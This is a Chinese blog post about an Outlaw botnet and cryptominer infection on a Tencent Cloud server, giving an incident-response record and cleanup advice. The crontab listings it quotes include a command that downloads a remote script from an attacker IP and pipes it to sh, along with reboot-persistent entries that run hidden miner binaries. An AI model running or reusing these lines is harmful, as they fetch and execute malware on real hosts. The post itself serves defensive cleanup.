Linux【问题记录 02】腾讯云 cron、sshd 进程CPU占用超95%(亡命徒 Outlaw 僵尸网络攻击)问题排查及处理步骤_crond占用cpu过高

已于 2024-04-28 11:14:44 修改
阅读量589 收藏 19
点赞数 18
分类专栏: 程序员 文章标签: linux 腾讯云 jenkins
于 2024-04-28 11:14:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83974227/article/details/138271976
版权

top - 13:55:18 up 21 days, 4:43, 1 user, load average: 4.52, 4.25, 3.76
Tasks: 285 total, 1 running, 284 sleeping, 0 stopped, 0 zombie
%Cpu(s): 96.7 us, 2.6 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.7 si, 0.0 st
KiB Mem : 1882020 total, 110312 free, 1209604 used, 562104 buff/cache
KiB Swap: 0 total, 0 free, 0 used. 218676 avail Mem

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
3460 elastic+ 20 0 307928 269380 4 S 70.8 14.3 611:32.96 cron
6011 elastic+ 20 0 50476 15104 4 S 24.9 0.8 4:55.06 sshd


查看了一下定时任务:

[root@tcloud ~]# crontab -l
no crontab for root


查看了一下 /var/spool/cron/ 文件夹的定时任务:

[root@tcloud ~]# cd /var/spool/cron/
[root@tcloud cron]# ll
total 12
-rw------- 1 elasticsearch elasticsearch 328 Sep 13 23:19 elasticsearch
-rw------- 1 gpadmin gpadmin 73 Sep 2 01:55 gpadmin
-rw------- 1 hadoop hadoop 283 Aug 20 11:57 hadoop

[root@tcloud cron]# cat ./elasticsearch
1 1 */2 * * /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1
@reboot /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1
5 8 * * 1 /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1
@reboot /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1
#0 */23 * * * /tmp/.X26-unix/.rsync/c/aptitude>/dev/null 2>&1

这个明显就是kdevtmpfsi挖矿病毒的定时任务

[root@tcloud cron]# cat ./gpadmin

          • wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1

[root@tcloud cron]# cat ./hadoop
1 1 */2 * * /tmp/.X25-unix/.rsync/c/a/upd>/dev/null 2>&1
@reboot /tmp/.X25-unix/.rsync/c/a/upd>/dev/null 2>&1
5 8 * * 1 /tmp/.X25-unix/.rsync/c/b/sync>/dev/null 2>&1
@reboot /tmp/.X25-unix/.rsync/c/b/sync>/dev/null 2>&1
0 */23 * * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1


查看了一下阿里云的服务器:

[root@aliyun ~]# cd /var/spool/cron/
[root@aliyun cron]# ll
total 0


### 2.病毒处理建议


建议企业 Linux 服务器管理员检查服务器资源占用情况,及时修改弱密码,避免被暴力破解。若发现服务器已被入侵安装挖矿木马,可参考以下步骤手动检查、清除:


1. 删除以下文件,杀死对应进程:  
 /tmp/\*-unix/.rsync/a/kswapd0  
 \*/.configrc/a/kswapd0 md5: 84945e9ea1950be3e870b798bd7c7559  
 /tmp/\*-unix/.rsync/c/tsm64 md5: 4adb78770e06f8b257f77f555bf28065  
 /tmp/\*-unix/.rsync/c/tsm32 md5: 10ea65f54f719bffcc0ae2cde450cb7a
2. 检查 cron.d 中是否存在包含以下内容的定时任务,如有进行删除:  
 /a/upd  
 /b/sync  
 /c/aptitude




### 最后的话

最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!

### 资料预览

给大家整理的视频资料:

![](https://img-blog.csdnimg.cn/img_convert/271f4030262dd7f336f0a8ef36345981.png)

给大家整理的电子书资料:

  

![](https://img-blog.csdnimg.cn/img_convert/c70a1aa6756eb37a92ace9fa313c66cf.png)



**如果本文对你有帮助,欢迎点赞、收藏、转发给朋友,让我有持续创作的动力!**

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化的资料的朋友,可以点击这里获取!](https://bbs.csdn.net/topics/618542503)**


**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
**


**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_83974227
关注
  • 18
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux服务器备份Oracle脚本及设置CRON详细步骤
07-22
Linux服务器备份Oracle脚本及设置CRON详细步骤。 1、包含shell脚本 2、包含crontab的详细设置 3、线上生产环境专用脚本
linux sshd占用cpu过高并且crontab -e修改定时任务无效的解决办法
泥耳空间
06-11 1183
同样也是被修改了文件属性,我们继续上面的chattr -iRa /var/spool/cron/root操作后再执行crontab -e或者直接vim文件即可修改保存,删掉定时任务。这是中了挖矿病毒了,并且会持续运行,就算杀掉进程也会再次运行。此病毒不仅这两处设置定时任务,/etc/cron.d/ 下也有,建议查看所有定时任务配置文件,下面的文件夹都进去检查下。查看用户定时任务,我的只有root用户下被设置了,如果有多个用户建议每个都查看。清理完所有定时任务后,并且病毒文件都删除了,这才算清理完成了。
Linux问题记录 02腾讯云 cronsshd 进程CPU占用95亡命徒 Outlaw 僵尸网络攻击问题排查处理步骤
Java与大数据相关实践内容分享!
09-15 1359
Linux问题记录 02腾讯云 cronsshd 进程CPU占用95亡命徒 Outlaw 僵尸网络攻击问题排查处理步骤
腾讯云Linux服务器中毒, sshd恶意进程导致CPU占用100%
刘献强的专栏
06-15 5034
top 命令, 发现有sshd恶意程序运行, 导致CPU占用100% 2.3 加强防火墙 控制访问该linux的来源IP, 因为是开发用的机器, 只要配置公司和家里的外网出口IP即可. 头痛, 做完 2.1, 2.2, 2.3 后, 恶意程序过一段时间后, 还是会重新下载到/var/tmp目录, 并运行. 最终, 无意中, 发现有恶意的linux定时任务存在, 删除即可!......
cgi进程设置多少 宝塔_Linux宝塔面板解决php-fpm占用CPU过高记录
weixin_39716510的博客
11-18 329
8月份的时候决定继续做最资源(www.zuiziyuan.com)。最资源实际上是在2012年的时候就已经注册域名并且下定决心好好做下来的,但是因为当时的生存问题一直没有坚持下来,毕竟都快流落街头了。2015年之后一直用的都是amh面板,也有感情了。但是amh4.2的免费版本支持的linux系统及mysql和php版本都太低了,一定程度上无法满足我的一些要求。当然这些要求也都很奇葩,比如我买的wo...
linux sshd cpu 过高 问题解决
qq_50247813的博客
03-17 327
linux sshd cpu 过高 问题解决
php-cgi进程cpu负载过高:禁用wordpress定时任务wp-cron.php
01-20
一、问题描述 1、19号手动升级到wordpress4.1,21号早上7点看网站php探针,发现系统负载过高,差不多在1到1.5之间。 2、虽然对于双核处理器,这个值还可以接受,但是之间负载都只有0.2左右,而网站流量又没有突然...
Linux下操作Cron后台进程.pdf
09-06
Linux下操作Cron后台进程.pdf
Linuxcrontab输出重定向不生效问题的解决方法
01-10
LINUX中,周期执行的任务一般由cron这个守护进程处理[ps -ef|grep cron]。cron读取一个或多个配置文件,这些配置文件中包含了命令行及其调用时间。 cron的配置文件称为“crontab”,是“cron table”的简写。 ...
linux下用cron定时执行任务的方法
01-11
名称 : crontab 使用权限 : 所有使用者 使用方式 : crontab file [-u user]-用指定的文件替代目前的crontab。 crontab-[-u user]-用标准输入替代目前的crontab. crontab-1[user]-列出用户目前的crontab....
dz论坛mysql 占用cpu_解决宝塔面板CPU占满100%,负载100%网站缓慢等问题
weixin_39564510的博客
11-22 823
宝塔服务器面板cpu、负载都是100%,一般来说这种问题的可能性很多,有可能是程序性能、服务器负载能力、PHP或Mysql并发访问、PHP-FPM进程占用、磁盘空间不足、木马病毒、被植入了挖矿程序等等,我们初步以几个方面来为大家做一下分析。其实这类问题可以这样考虑,比如说CPU占用的多,我们可以提高内存的使用率、提高磁盘的IO性能等等。我们今天主要从服务器运行环境出发,来为朋友们分析。1、mysq...
宝塔sshd占用cpu过高解决教程
最新发布
QQ56669388的博客
02-21 312
如果还没解决,+v: hezuome 帮助您彻底清除。
sshd占用cpu过高
偶尔写些东西,意思一下我也参与了内卷
03-08 1300
记录下我这里出现的原因FinalShell 链接机器后从左侧的cpu占用图看到的,我进入机器执行命令确实如下;但是用finalShell链接我阿里云/腾讯服务器没有出现,可能是其他服务器的防火墙比较完善;
linux cpu占用过高问题排查思路
weixin_40048063的博客
04-18 5780
记录一次cpu占用过高排查思路 运营反馈线上环境app加载缓慢,于是查看了服务器cpu,发现cpu使用率高。 1,首先根据top命令,发现占用cpu最高的进程PID 如11291. 通过ps aux | grep PID命令,进一步查看当前进程的具体信息。 ps -mp 14811 -o THREAD,tid,time 找到耗时最高的线程TID,并将其线程ID转换为16进制格式:  ...
ssh连接或者su - 其他用户特别慢
weixin_43965016的博客
06-03 501
ssh连接或者su - 其他用户特别慢 方法一、 检查sshd、systemd-logind.service、dbus、polkit.service这几个服务是否正常, 先重启systemd-logind.service是否报错,如果报错: 任何执行时问题都可以通过以下命令修复,它不会妨碍系统上的任何事情 systemctl daemon-reexec 如果daemon-reexec因时而失败,那么杀死systemd进程再尝試 kill -9 1 如果ssh无响应,注意检查默认路由 方法二、 system
linux服务器挖矿程序xmrig入侵以及解决方案
热门推荐
weixin_46575363的博客
09-03 1万+
记一次Xmrig挖矿木马排查过程 2021年9月2日晚上,突然收到阿里云的一条短信,说是服务器被挖矿软件入侵了,马上打开电脑查看 控制台CPU占用 原因分析与解决方案 寻找原因 查找挖矿进程 top -H 从图上我们可以找到CPU占用100%的进行名为xmrig(甚至都不伪装一下进程名) 查找挖矿程序文件位置 root@xxx:/# find / -name ‘xmrig’ /root/.c3pool/xmrig --config=/root/.c3pool/config.json 我们尝试kill掉
PHP在宝塔面板下,CPU占用过高 接近100%,吓死宝宝了
喵喵喵~~~的博客
11-09 2016
你好,打工人! 早上上班,前端妹子说要对接客服系统,我就兴高采烈地给她讲解怎样在客户端嵌入我部署的客服系统, 经过一阵暴雨梨花的讲解,终于,在我口水即将喷完的时候讲明白了,我飘了~~~。 然后我准备再去服务器上巡视一番,当我打开宝塔面板的时候,惊呆了, 服务器 cup使用率100%,负载状态100%,瞬间从一万米高空坠下,周身气温降到零下。 看到这种情况,我只能努力的平复面临崩溃的心态,右手抚额,由上而下,滑过鼻尖的时候深吸一口气, 假装淡定的 一顿shell操作,查看源头(其实只会一
linux 指定cpu 利用率50%脚本
07-26
### 回答1: 在Linux系统中,可以使用一些命令和脚本来指定CPU利用率为50%。一种方法是使用stress命令。stress是一个可以用来测试系统稳定性的工具,也可以用来模拟CPU负载。 首先,确保您的系统已经安装了stress工具。在终端中输入以下命令以安装stress: sudo apt-get install stress 安装完成后,可以使用以下命令来指定CPU利用率为50%: stress --cpu 1 --timeout 60 上述命令中,--cpu 1表示只使用1个CPU核心,--timeout 60表示持续运行60秒。这将导致系统的1个CPU核心的利用率保持在50%左右。 如果您希望系统的所有CPU核心都以50%的利用率运行,可以修改上述命令为: stress --cpu $(nproc) --timeout 60 上述命令中,$(nproc)将返回系统的CPU核心数量,并将其作为参数传递给--cpu选项,从而使用全部CPU核心。 运行以上命令后,系统的CPU利用率将接近50%。可以使用top命令或htop命令来查看系统CPU利用率是否已达到目标。当执行完设定的时间(60秒)后,stress命令会自动退出,CPU利用率将会恢复到正常水平。 需要注意的是,这只是一个简单的示例。更复杂的任务可以使用更多选项和参数来实现不同的CPU利用率目标。请确保根据具体需求进行适当的调整。 ### 回答2: 要实现Linux系统指定CPU利用率达到50%的脚本,可以使用stress工具结合任务调度工具来完成。 首先,安装stress工具。在终端中输入以下命令: ``` sudo apt-get install stress ``` 然后,创建一个脚本文件如"cpu.sh",并在终端中输入以下命令: ``` nano cpu.sh ``` 然后在cpu.sh文件中输入以下内容: ```bash #!/bin/bash stress --cpu 1 --timeout 30 ``` 这个脚本会使用stress工具模拟一个CPU负载,并持续运行30秒。 保存并退出cpu.sh文件(按Ctrl + X,然后按Y,最后按Enter)。 接下来,使用任务调度工具来调度这个脚本,以使得脚本定期执行并达到50%的CPU利用率。 在终端中输入以下命令来编辑cron表: ``` crontab -e ``` 然后,在打开的文本编辑器中将以下内容添加到文件的底部: ```bash * * * * * /path/to/cpu.sh ``` 请将"/path/to/cpu.sh"替换为实际的脚本文件路径。 保存并退出文本编辑器。 现在,每分钟脚本文件就会执行一次,模拟CPU负载,并持续运行30秒。根据系统和硬件的不同,这个脚本将尽量使得CPU利用率达到50%的水平。 ### 回答3: 在Linux上指定CPU利用率为50%的脚本可以使用stress命令来实现。stress命令是一个压力测试工具,它可以模拟CPU、内存、磁盘和网络等多种资源的负载。 以下是一个用于指定CPU利用率为50%的简单脚本: ```shell #!/bin/bash # 设置要测试的CPU核心数量 CORES=$(grep -c "^processor" /proc/cpuinfo) # 设置要实现的目标CPU利用率 TARGET_UTILIZATION=50 # 计算每个核心需要的线程数 THREADS=$(echo "scale=0; $CORES * $TARGET_UTILIZATION / 100" | bc) # 启动stress命令,限制CPU利用率 stress --cpu $THREADS --timeout 60s ``` 解释: - `CORES`变量获取当前计算机的CPU核心数量。 - `TARGET_UTILIZATION`变量指定目标CPU利用率为50%。 - `THREADS`变量根据目标利用率和核心数量计算出每个核心需要的线程数。这里使用bc命令进行小数运算。 - `stress`命令用于创建负载,`--cpu`参数指定创建CPU负载,`$THREADS`指定线程数,`--timeout`参数指定持续时间,这里设置为60秒。 可以在终端中将上述脚本保存到一个文件(例如script.sh),并使用以下命令运行它: ```shell chmod +x script.sh ./script.sh ``` 运行脚本后,每个CPU核心的利用率应该接近50%。可以根据需求修改目标利用率或持续时间。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值